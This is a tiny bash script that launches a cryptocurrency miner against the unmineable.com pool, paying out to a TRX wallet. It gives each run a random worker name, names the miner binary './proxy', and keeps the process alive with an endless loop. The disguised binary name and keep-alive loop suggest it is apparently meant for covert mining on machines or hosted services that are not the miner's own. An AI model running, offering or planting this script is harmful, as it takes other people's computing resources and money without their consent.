#!/bin/bash
POOL=rx-us.unmineable.com:443
WALLET=TRX:TTCnXEWmpqS6GD615Ap5DHj1PWo5fptr16
WORKEER=$(echo $(shuf -i 1000-9999 -n 1)-OK#ek61-6h9x)

./proxy --algorithm wrkzcoin --pool $POOL --username $WALLET.$WORKEER --password x
while [ 1 ]; do 
sleep 3
done 
sleep 999
